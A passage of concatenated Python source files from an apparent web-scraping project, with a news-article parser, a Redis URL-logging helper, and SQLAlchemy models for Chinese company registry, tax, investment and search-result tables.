ex = GetNewsArticle(unicode_url=url, unicode_html=r.text)
print(ex.get_article())
# ex = htmltoarticle(html=r.text)
# print ex.get_ariticle()
```
#### File: HTML/Parse/NewsParse.py
```python
from newspaper import Article
class NewsParse:
def __init__(self, **kw):
self.html = kw.get("html")
self.url = kw.get("url")
def getNewsItem(self, **kw):
data = dict()
html = self.html if self.html else kw.get("html")
doc = Article(kw.get("url", "-"), language="zh")
doc.download(input_html=html)
doc.parse()
data["url"] = doc.url
data["title"] = doc.title
data["content"] = doc.text
data["date"] = str(doc.publish_date)
return data
if __name__ == '__main__':
from pprint import pprint
# html = """</div>2018-09-18 13:35:03 <a href='http://look.huanqiu.com/article/2018-09/13041797.html' target='_blank'>环球网</a> <span class="chan_newsInfo_comment"><a href="#comment">参与评论(<em id="top_comment_number"></em>)人</a></span>"""
html = open("a.html", encoding="utf-8").read()
pprint(NewsParse.getNewsItem(NewsParse(), html=html))
```
#### File: XX/HTML/UrlInfoHelper.py
```python
import json
import XX.File.FileHelper as cf
class UrlInfoHelper(object):
# json str 2 redis。把异常的url记录下来,并把缓存删了
@staticmethod
def add2redis(url_info, redis_key, redis_conn, del_cache=0, spider="", getUrlCachePath=None, uniqueUrl=None):
try:
redis_conn.rpush(redis_key, json.dumps(url_info))
except:
print("==UrlInfoHelper->Add redis is wrong")
if del_cache:
cache_fp = getUrlCachePath(uniqueUrl(url_info.get("url")), spider=spider)
if cf.FileHelper.is_file_exit(cache_fp):
print("Remove cache file + " + cache_fp + "\t url is " + url_info.get("url"))
cf.FileHelper.remove_file(cache_fp)
else:
print("=====Cache is not exists========" + cache_fp)
else:
print("--" * 50, flush=True)
if __name__ == '__main__':
pass
```
#### File: Model/Object/ResponseJson.py
```python
import json
# 服务端生成的response json结构封装
class ResponseJson(object):
data = None
code = 0
msg = ""
def __init__(self, data=None, code=0, msg="", status="ok", *arg, **kw):
self.data = data
self.code = code
self.msg = msg
@staticmethod
def get_response_json(data=None, code=0, msg="", resformat="dict", status="ok", *arg, **kw):
if not msg:
if code == 0:
msg = "ok"
else:
msg = "err"
response_json = {"data": data, "code": code, "msg": msg}
if resformat == "dict":
return response_json
elif resformat == "str":
return json.dumps(response_json, ensure_ascii=False)
else:
return response_json
if __name__ == "__main__":
res = ResponseJson()
print(res.__dict__)
pass
```
#### File: SqlAlchemy/Company/ComBasic1Model.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class ComBasic1Model(Base, BaseModel):
__tablename__ = 'com_basic1'
id = Column(Integer, primary_key=True)
web_id = Column(String(255), unique=True)
batchid = Column(String(255))
oaddress = Column(String(255))
orpt_name = Column(String(255))
oname = Column(String(255))
regcode = Column(String(255), index=True)
uccode = Column(String(255), index=True)
etcode = Column(String(255))
max_score = Column(String(255))
is_del = Column(Integer)
c_ts = Column(Integer)
u_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.batchid = kw.get("batchid", None)
self.c_ts = kw.get("c_ts", None)
self.etcode = kw.get("etcode", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.max_score = kw.get("max_score", None)
self.metadata = kw.get("metadata", None)
self.oaddress = kw.get("oaddress", None)
self.oname = kw.get("oname", None)
self.orpt_name = kw.get("orpt_name", None)
self.regcode = kw.get("regcode", None)
self.u_ts = kw.get("u_ts", None)
self.uccode = kw.get("uccode", None)
self.web_id = kw.get("web_id", None)
if __name__ == '__main__':
createInitFunction(ComBasic1Model)
```
#### File: SqlAlchemy/Company/CompanyInfoModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String, Text
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyInfoModel(Base, BaseModel):
__tablename__ = 'company_info'
id = Column(Integer, primary_key=True)
com_id = Column(Integer, index=True)
web_key = Column(String(255, 'utf8mb4_unicode_ci'))
logo = Column(String(255, 'utf8mb4_unicode_ci'))
name = Column(String(255, 'utf8mb4_unicode_ci'))
tel = Column(String(255, 'utf8mb4_unicode_ci'))
email = Column(String(255, 'utf8mb4_unicode_ci'))
web_url = Column(String(255, 'utf8mb4_unicode_ci'))
Address = Column(String(255, 'utf8mb4_unicode_ci'))
AnnualReports = Column(String(255, 'utf8mb4_unicode_ci'))
CreditCode = Column(String(255, 'utf8mb4_unicode_ci'))
taxpayer_no = Column(String(255, 'utf8mb4_unicode_ci'))
No = Column(String(255, 'utf8mb4_unicode_ci'))
organization_no = Column(String(255, 'utf8mb4_unicode_ci'))
Oper_id = Column(Integer)
OperName = Column(String(255, 'utf8mb4_unicode_ci'))
RegistCapi = Column(String(255, 'utf8mb4_unicode_ci'))
Status = Column(String(255, 'utf8mb4_unicode_ci'))
StartDate = Column(String(255, 'utf8mb4_unicode_ci'))
EconKind = Column(String(255, 'utf8mb4_unicode_ci'))
staff_num = Column(String(255, 'utf8mb4_unicode_ci'))
TermStart = Column(String(255, 'utf8mb4_unicode_ci'))
TeamEnd = Column(String(255, 'utf8mb4_unicode_ci'))
BelongOrg = Column(String(255, 'utf8mb4_unicode_ci'))
CheckDate = Column(String(255, 'utf8mb4_unicode_ci'))
en_name = Column(String(255, 'utf8mb4_unicode_ci'))
register_addr = Column(String(255, 'utf8mb4_unicode_ci'))
industry_belong = Column(String(255, 'utf8mb4_unicode_ci'))
used_name = Column(String(255, 'utf8mb4_unicode_ci'))
location = Column(String(255, 'utf8mb4_unicode_ci'))
Scope = Column(Text(collation='utf8mb4_unicode_ci'))
intro = Column(Text(collation='utf8mb4_unicode_ci'))
EndDate = Column(String(255, 'utf8mb4_unicode_ci'))
Province = Column(String(50, 'utf8mb4_unicode_ci'))
Industry = Column(String(255, 'utf8mb4_unicode_ci'))
ImageUrl = Column(String(255, 'utf8mb4_unicode_ci'))
OrgNo = Column(String(255, 'utf8mb4_unicode_ci'))
EnglishName = Column(String(255, 'utf8mb4_unicode_ci'))
Type = Column(String(255, 'utf8mb4_unicode_ci'))
Tag = Column(String(255, 'utf8mb4_unicode_ci'))
Financing = Column(String(255, 'utf8mb4_unicode_ci'))
DbUpdatedDate = Column(Integer)
ShortStatus = Column(String(20, 'utf8mb4_unicode_ci'))
IsExpired = Column(String(5, 'utf8mb4_unicode_ci'))
DUNSNo = Column(String(25, 'utf8mb4_unicode_ci'))
TaxNo = Column(String(25, 'utf8mb4_unicode_ci'))
CbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
AbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
OpForm = Column(String(5, 'utf8mb4_unicode_ci'))
RecCap = Column(String(55, 'utf8mb4_unicode_ci'))
Liquidation = Column(String(5, 'utf8mb4_unicode_ci'))
SimpleCancellation = Column(String(5, 'utf8mb4_unicode_ci'))
CompanyStatus = Column(Integer)
HoldingType = Column(String(25, 'utf8mb4_unicode_ci'))
id_del = Column(String(255, 'utf8mb4_unicode_ci'))
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.AbuItem = kw.get("AbuItem", None)
self.Address = kw.get("Address", None)
self.AnnualReports = kw.get("AnnualReports", None)
self.BelongOrg = kw.get("BelongOrg", None)
self.CbuItem = kw.get("CbuItem", None)
self.CheckDate = kw.get("CheckDate", None)
self.CompanyStatus = kw.get("CompanyStatus", None)
self.CreditCode = kw.get("CreditCode", None)
self.DUNSNo = kw.get("DUNSNo", None)
self.DbUpdatedDate = kw.get("DbUpdatedDate", None)
self.EconKind = kw.get("EconKind", None)
self.EndDate = kw.get("EndDate", None)
self.EnglishName = kw.get("EnglishName", None)
self.Financing = kw.get("Financing", None)
self.HoldingType = kw.get("HoldingType", None)
self.ImageUrl = kw.get("ImageUrl", None)
self.Industry = kw.get("Industry", None)
self.IsExpired = kw.get("IsExpired", None)
self.Liquidation = kw.get("Liquidation", None)
self.No = kw.get("No", None)
self.OpForm = kw.get("OpForm", None)
self.Oper_id = kw.get("Oper_id", None)
self.OperName = kw.get("OperName", None)
self.OrgNo = kw.get("OrgNo", None)
self.Province = kw.get("Province", None)
self.RecCap = kw.get("RecCap", None)
self.RegistCapi = kw.get("RegistCapi", None)
self.Scope = kw.get("Scope", None)
self.ShortStatus = kw.get("ShortStatus", None)
self.SimpleCancellation = kw.get("SimpleCancellation", None)
self.StartDate = kw.get("StartDate", None)
self.Status = kw.get("Status", None)
self.Tag = kw.get("Tag", None)
self.TaxNo = kw.get("TaxNo", None)
self.TeamEnd = kw.get("TeamEnd", None)
self.TermStart = kw.get("TermStart", None)
self.Type = kw.get("Type", None)
self.com_id = kw.get("com_id", None)
self.web_key = kw.get("web_key", None)
self.create_ts = kw.get("create_ts", None)
self.email = kw.get("email", None)
self.en_name = kw.get("en_name", None)
self.get = kw.get("get", None)
self.getAll = kw.get("getAll", None)
self.getAllIds = kw.get("getAllIds", None)
self.getByFromId = kw.get("getByFromId", None)
self.getByFromIdAndMod = kw.get("getByFromIdAndMod", None)
self.getByName = kw.get("getByName", None)
self.getColumsByFromIdAndMod = kw.get("getColumsByFromIdAndMod", None)
self.id = kw.get("id", None)
self.id_del = kw.get("id_del", None)
self.industry_belong = kw.get("industry_belong", None)
self.intro = kw.get("intro", None)
self.location = kw.get("location", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.organization_no = kw.get("organization_no", None)
self.register_addr = kw.get("register_addr", None)
self.staff_num = kw.get("staff_num", None)
self.taxpayer_no = kw.get("taxpayer_no", None)
self.tel = kw.get("tel", None)
self.updateId = kw.get("updateId", None)
self.update_ts = kw.get("update_ts", None)
self.used_name = kw.get("used_name", None)
self.web_url = kw.get("web_url", None)
if __name__ == '__main__':
createInitFunction(CompanyInfoModel)
```
#### File: SqlAlchemy/Company/CompanyInverst.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, String
from sqlalchemy.dialects.mysql import INTEGER
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyInvest(Base, BaseModel):
__tablename__ = 'company_invest'
id = Column(INTEGER(11), primary_key=True)
invest_id = Column(INTEGER(11))
invest_to_id = Column(INTEGER(11))
CompanyCode = Column(String(255))
Percent = Column(String(255))
PercentTotal = Column(String(255))
Level = Column(INTEGER(11))
Org = Column(INTEGER(11))
ShouldCapi = Column(String(255))
StockRightNum = Column(String(255))
DetailCount = Column(INTEGER(11))
DetailList = Column(String(255))
ShortStatus = Column(String(255))
is_del = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.CompanyCode = kw.get("CompanyCode", None)
self.DetailCount = kw.get("DetailCount", None)
self.DetailList = kw.get("DetailList", None)
self.Level = kw.get("Level", None)
self.Org = kw.get("Org", None)
self.Percent = kw.get("Percent", None)
self.PercentTotal = kw.get("PercentTotal", None)
self.ShortStatus = kw.get("ShortStatus", None)
self.ShouldCapi = kw.get("ShouldCapi", None)
self.StockRightNum = kw.get("StockRightNum", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.invest_id = kw.get("invest_id", None)
self.invest_to_id = kw.get("invest_to_id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.update_ts = kw.get("update_ts", None)
def getInvestRelation(self, invest_id, invest_to_id, session):
return session.query(CompanyInvest.id).filter(CompanyInvest.invest_id == invest_id, CompanyInvest.invest_to_id == invest_to_id).limit(1).all()
if __name__ == '__main__':
createInitFunction(CompanyInvest)
```
#### File: SqlAlchemy/Company/CompanyTaxModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String, Text, func
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyTaxModel(Base, BaseModel):
__tablename__ = 'company_tax'
id = Column(Integer, primary_key=True)
com_id = Column(Integer)
web_key = Column(String(50))
Name = Column(String(255))
CreditCode = Column(String(255))
Address = Column(String(255))
PhoneNumber = Column(String(255))
Bank = Column(String(255))
Bankaccount = Column(String(255))
is_del = Column(Integer)
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.Address = kw.get("Address", None)
self.Bank = kw.get("Bank", None)
self.Bankaccount = kw.get("Bankaccount", None)
self.CreditCode = kw.get("CreditCode", None)
self.Name = kw.get("Name", None)
self.PhoneNumber = kw.get("PhoneNumber", None)
self.com_id = kw.get("com_id", None)
self.web_key = kw.get("web_key", None)
self.create_ts = kw.get("create_ts", None)
self.get = kw.get("get", None)
self.getAll = kw.get("getAll", None)
self.getAllIds = kw.get("getAllIds", None)
self.getByFromId = kw.get("getByFromId", None)
self.getByFromIdAndMod = kw.get("getByFromIdAndMod", None)
self.getByName = kw.get("getByName", None)
self.getColumsByFromIdAndMod = kw.get("getColumsByFromIdAndMod", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.updateId = kw.get("updateId", None)
self.update_ts = kw.get("update_ts", None)
if __name__ == '__main__':
createInitFunction(CompanyTaxModel)
```
#### File: SqlAlchemy/Company/CompanyTyc.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, Index, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyTyc(Base, BaseModel):
__tablename__ = 'company_tyc'
__table_args__ = (
Index('wy', 'no', 'creditno', unique=True),
)
id = Column(Integer, primary_key=True)
web_id = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
name = Column(String(255, 'utf8mb4_unicode_ci'))
no = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
creditno = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
is_del = Column(Integer)
u_ts = Column(Integer)
c_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.c_ts = kw.get("c_ts", None)
self.creditno = kw.get("creditno", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.no = kw.get("no", None)
self.u_ts = kw.get("u_ts", None)
self.web_id = kw.get("web_id", None)
if __name__ == '__main__':
createInitFunction(CompanyTyc)
```
#### File: SqlAlchemy/Company/InfoModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, Index, TEXT, VARCHAR, text
from sqlalchemy.dialects.mysql.types import TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class Info12315(Base, BaseModel):
__tablename__ = 'info12315'
__table_args__ = (
Index('wy', 'NBXH', 'REGNO', unique=True),
Index('REGNO', 'REGNO', 'NBXH')
)
id = Column(Integer, primary_key=True)
ADDR = Column(VARCHAR(255))
ANADDR = Column(VARCHAR(255))
ENTTYPE = Column(VARCHAR(255))
ENTTYPENAME = Column(VARCHAR(255))
HIGHLIGHTTITLE = Column(VARCHAR(255))
INVOPT = Column(VARCHAR(255))
JYFW = Column(TEXT)
NBXH = Column(VARCHAR(80))
PRIPID = Column(VARCHAR(255))
QYBM = Column(VARCHAR(255))
QYWZ = Column(VARCHAR(255))
REGNO = Column(VARCHAR(80))
REGSTATECODE = Column(VARCHAR(255))
REGSTATE_CN = Column(VARCHAR(255))
REGUNIT = Column(VARCHAR(255))
REGUNITNAME = Column(VARCHAR(255))
SQ = Column(VARCHAR(255))
S_EXT_NODENUM = Column(VARCHAR(255))
TEL = Column(VARCHAR(255))
UBINDTYPE = Column(VARCHAR(255))
UBINDTYPENAME = Column(VARCHAR(255))
UNITCODE = Column(VARCHAR(255))
UNITNAME = Column(VARCHAR(255))
XZQHBM = Column(VARCHAR(255))
is_del = Column(Integer)
u_ts = Column(Integer)
c_ts = Column(Integer)
crawl_detail = Column(TINYINT(4), server_default=text("'0'"))
def __init__(self, *arg, **kw):
self.ADDR = kw.get("ADDR", None)
self.ANADDR = kw.get("ANADDR", None)
self.ENTTYPE = kw.get("ENTTYPE", None)
self.ENTTYPENAME = kw.get("ENTTYPENAME", None)
self.HIGHLIGHTTITLE = kw.get("HIGHLIGHTTITLE", None)
self.INVOPT = kw.get("INVOPT", None)
self.JYFW = kw.get("JYFW", None)
self.NBXH = kw.get("NBXH", None)
self.PRIPID = kw.get("PRIPID", None)
self.QYBM = kw.get("QYBM", None)
self.QYWZ = kw.get("QYWZ", None)
self.REGNO = kw.get("REGNO", None)
self.REGSTATECODE = kw.get("REGSTATECODE", None)
self.REGSTATE_CN = kw.get("REGSTATE_CN", None)
self.REGUNIT = kw.get("REGUNIT", None)
self.REGUNITNAME = kw.get("REGUNITNAME", None)
self.SQ = kw.get("SQ", None)
self.S_EXT_NODENUM = kw.get("S_EXT_NODENUM", None)
self.TEL = kw.get("TEL", None)
self.UBINDTYPE = kw.get("UBINDTYPE", None)
self.UBINDTYPENAME = kw.get("UBINDTYPENAME", None)
self.UNITCODE = kw.get("UNITCODE", None)
self.UNITNAME = kw.get("UNITNAME", None)
self.XZQHBM = kw.get("XZQHBM", None)
self.c_ts = kw.get("c_ts", None)
self.crawl_detail = kw.get("crawl_detail", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.u_ts = kw.get("u_ts", None)
if __name__ == '__main__':
createInitFunction(Info12315)
```
#### File: Model/SqlAlchemy/SaaSModel.py
```python
from BaseModel.BaseModel import *
from sqlalchemy import Column, String, TIMESTAMP, Text, text, DateTime
from sqlalchemy.dialects.mysql import INTEGER, LONGTEXT, TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class BaiduAdvertisement(Base, BaseModel):
__tablename__ = 'baidu_advertisement'
id = Column(INTEGER(11), primary_key=True)
url = Column(String(255))
real_url = Column(String(255))
snapshot_url = Column(String(255))
title = Column(String(255))
is_del = Column(INTEGER(11), server_default=text("'0'"))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.real_url = kw.get("real_url", None)
self.snapshot_url = kw.get("snapshot_url", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class BaiduSearchResult(Base, BaseModel):
__tablename__ = 'wp_saas_baidu_search_result'
id = Column(INTEGER(11), primary_key=True)
platform = Column(String(255))
keyword = Column(String(255))
crawl_time = Column(INTEGER(11))
url = Column(String(255))
real_url = Column(String(255), unique=True)
source_url = Column(String(255))
title = Column(String(255))
spider = Column(String(60))
skip_url = Column(Text)
snapshot_url = Column(Text)
show_url = Column(Text)
is_ad = Column(TINYINT(1))
content = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.content = kw.get("content", None)
self.crawl_time = kw.get("crawl_time", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_ad = kw.get("is_ad", None)
self.is_del = kw.get("is_del", None)
self.keyword = kw.get("keyword", None)
self.metadata = kw.get("metadata", None)
self.platform = kw.get("platform", None)
self.real_url = kw.get("real_url", None)
self.show_url = kw.get("show_url", None)
self.skip_url = kw.get("skip_url", None)
self.snapshot_url = kw.get("snapshot_url", None)
self.source_url = kw.get("source_url", None)
self.spider = kw.get("spider", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class Company(Base, BaseModel):
__tablename__ = 'wp_saas_company'
id = Column(INTEGER(11), primary_key=True)
ADDR = Column(String(255, 'utf8mb4_unicode_ci'))
ANADDR = Column(String(255, 'utf8mb4_unicode_ci'))
ENTTYPE = Column(String(255, 'utf8mb4_unicode_ci'))
ENTTYPENAME = Column(String(255, 'utf8mb4_unicode_ci'))
HIGHLIGHTTITLE = Column(String(255, 'utf8mb4_unicode_ci'))
INVOPT = Column(String(255, 'utf8mb4_unicode_ci'))
JYFW = Column(Text(collation='utf8mb4_unicode_ci'))
NBXH = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
PRIPID = Column(String(255, 'utf8mb4_unicode_ci'))
QYBM = Column(String(255, 'utf8mb4_unicode_ci'))
QYWZ = Column(String(255, 'utf8mb4_unicode_ci'))
REGNO = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
REGSTATECODE = Column(String(255, 'utf8mb4_unicode_ci'))
REGSTATE_CN = Column(String(255, 'utf8mb4_unicode_ci'))
REGUNIT = Column(String(255, 'utf8mb4_unicode_ci'))
REGUNITNAME = Column(String(255, 'utf8mb4_unicode_ci'))
SQ = Column(String(255, 'utf8mb4_unicode_ci'))
S_EXT_NODENUM = Column(String(255, 'utf8mb4_unicode_ci'))
TEL = Column(String(255, 'utf8mb4_unicode_ci'))
UBINDTYPE = Column(String(255, 'utf8mb4_unicode_ci'))
UBINDTYPENAME = Column(String(255, 'utf8mb4_unicode_ci'))
UNITCODE = Column(String(255, 'utf8mb4_unicode_ci'))
UNITNAME = Column(String(255, 'utf8mb4_unicode_ci'))
XZQHBM = Column(String(255, 'utf8mb4_unicode_ci'))
reg_time = Column(DateTime)
is_del = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.ADDR = kw.get("ADDR", None)
self.ANADDR = kw.get("ANADDR", None)
self.ENTTYPE = kw.get("ENTTYPE", None)
self.ENTTYPENAME = kw.get("ENTTYPENAME", None)
self.HIGHLIGHTTITLE = kw.get("HIGHLIGHTTITLE", None)
self.INVOPT = kw.get("INVOPT", None)
self.JYFW = kw.get("JYFW", None)
self.NBXH = kw.get("NBXH", None)
self.PRIPID = kw.get("PRIPID", None)
self.QYBM = kw.get("QYBM", None)
self.QYWZ = kw.get("QYWZ", None)
self.REGNO = kw.get("REGNO", None)
self.REGSTATECODE = kw.get("REGSTATECODE", None)
self.REGSTATE_CN = kw.get("REGSTATE_CN", None)
self.REGUNIT = kw.get("REGUNIT", None)
self.REGUNITNAME = kw.get("REGUNITNAME", None)
self.SQ = kw.get("SQ", None)
self.S_EXT_NODENUM = kw.get("S_EXT_NODENUM", None)
self.TEL = kw.get("TEL", None)
self.UBINDTYPE = kw.get("UBINDTYPE", None)
self.UBINDTYPENAME = kw.get("UBINDTYPENAME", None)
self.UNITCODE = kw.get("UNITCODE", None)
self.UNITNAME = kw.get("UNITNAME", None)
self.XZQHBM = kw.get("XZQHBM", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.reg_time = kw.get("reg_time", None)
self.update_ts = kw.get("update_ts", None)
class ItjuziCompany(Base, BaseModel):
__tablename__ = 'itjuzi_company'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(255))
des = Column(String(255))
logo = Column(String(255))
web_id = Column(INTEGER(11))
is_del = Column(TINYINT(255))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP, server_default=text("CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.des = kw.get("des", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.update_ts = kw.get("update_ts", None)
self.web_id = kw.get("web_id", None)
class ItjuziNew(Base, BaseModel):
__tablename__ = 'itjuzi_news'
id = Column(INTEGER(11), primary_key=True)
title = Column(String(255))
url = Column(String(255))
logo = Column(String(255))
web_id = Column(INTEGER(11))
is_del = Column(TINYINT(255))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP, server_default=text("CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
self.web_id = kw.get("web_id", None)
class Url(Base, BaseModel):
__tablename__ = 'wp_saas_url'
id = Column(INTEGER(11), primary_key=True)
domain = Column(String(255), index=True)
url = Column(String(255), index=True)
name = Column(String(255), index=True)
level = Column(INTEGER(11))
p_id = Column(INTEGER(11))
content = Column(Text)
title = Column(Text)
description = Column(Text)
keywords = Column(Text)
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.content = kw.get("content", None)
self.create_ts = kw.get("create_ts", None)
self.description = kw.get("description", None)
self.domain = kw.get("domain", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.keywords = kw.get("keywords", None)
self.level = kw.get("level", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.p_id = kw.get("p_id", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class Keyword(Base, BaseModel):
__tablename__ = 'wp_saas_keywords'
id = Column(INTEGER(11), primary_key=True)
words = Column(String(192), nullable=False, unique=True)
source = Column(INTEGER(1))
flag = Column(INTEGER(1))
update_ts = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
create_ts = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.flag = kw.get("flag", None)
self.id = kw.get("id", None)
self.metadata = kw.get("metadata", None)
self.source = kw.get("source", None)
self.update_ts = kw.get("update_ts", None)
self.words = kw.get("words", None)
class NewsSearch(Base, BaseModel):
__tablename__ = 'news_search'
id = Column(INTEGER(11), primary_key=True)
source_url = Column(String(255))
url = Column(String(255))
title = Column(String(255))
top_image = Column(String(255))
meta_img = Column(String(255))
movies = Column(LONGTEXT)
text = Column(String(255))
keywords = Column(LONGTEXT)
meta_keywords = Column(LONGTEXT)
tags = Column(LONGTEXT)
authors = Column(LONGTEXT)
publish_date = Column(String(255))
summary = Column(String(255))
is_parsed = Column(String(255))
download_state = Column(INTEGER(11))
download_exception_msg = Column(String(255))
meta_description = Column(String(255))
meta_lang = Column(String(255))
meta_favicon = Column(String(255))
meta_data = Column(LONGTEXT)
canonical_link = Column(String(255))
additional_data = Column(LONGTEXT)
link_hash = Column(String(255))
is_del = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP)
def __init__(self, *arg, **kw):
self.additional_data = kw.get("additional_data", None)
self.authors = kw.get("authors", None)
self.canonical_link = kw.get("canonical_link", None)
self.create_ts = kw.get("create_ts", None)
self.download_exception_msg = kw.get("download_exception_msg", None)
self.download_state = kw.get("download_state", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.is_parsed = kw.get("is_parsed", None)
self.keywords = kw.get("keywords", None)
self.link_hash = kw.get("link_hash", None)
self.meta_data = kw.get("meta_data", None)
self.meta_description = kw.get("meta_description", None)
self.meta_favicon = kw.get("meta_favicon", None)
self.meta_img = kw.get("meta_img", None)
self.meta_keywords = kw.get("meta_keywords", None)
self.meta_lang = kw.get("meta_lang", None)
self.metadata = kw.get("metadata", None)
self.movies = kw.get("movies", None)
self.publish_date = kw.get("publish_date", None)
self.source_url = kw.get("source_url", None)
self.summary = kw.get("summary", None)
self.tags = kw.get("tags", None)
self.text = kw.get("text", None)
self.title = kw.get("title", None)
self.top_image = kw.get("top_image", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class Product(Base, BaseModel):
__tablename__ = 'wp_saas_product'
id = Column(INTEGER(11), primary_key=True)
url_id = Column(INTEGER(11), index=True)
name = Column(String(255), index=True)
p_id = Column(INTEGER(11))
logo = Column(String(255))
intro = Column(LONGTEXT)
company_id = Column(INTEGER(11))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.company_id = kw.get("company_id", None)
self.id = kw.get("id", None)
self.intro = kw.get("intro", None)
self.is_del = kw.get("is_del", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.p_id = kw.get("p_id", None)
self.update_ts = kw.get("update_ts", None)
self.url_id = kw.get("url_id", None)
class ProductSearch(Base, BaseModel):
__tablename__ = 'product_search'
id = Column(INTEGER(11), primary_key=True)
source_url = Column(String(255))
url = Column(String(255))
title = Column(String(255))
top_image = Column(String(255))
meta_img = Column(String(255))
movies = Column(LONGTEXT)
text = Column(String(255))
keywords = Column(LONGTEXT)
meta_keywords = Column(LONGTEXT)
tags = Column(LONGTEXT)
authors = Column(LONGTEXT)
publish_date = Column(String(255))
summary = Column(String(255))
is_parsed = Column(String(255))
download_state = Column(INTEGER(11))
download_exception_msg = Column(String(255))
meta_description = Column(String(255))
meta_lang = Column(String(255))
meta_favicon = Column(String(255))
meta_data = Column(LONGTEXT)
canonical_link = Column(String(255))
additional_data = Column(LONGTEXT)
link_hash = Column(String(255))
is_del = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP)
def __init__(self, *arg, **kw):
self.additional_data = kw.get("additional_data", None)
self.authors = kw.get("authors", None)
self.canonical_link = kw.get("canonical_link", None)
self.create_ts = kw.get("create_ts", None)
self.download_exception_msg = kw.get("download_exception_msg", None)
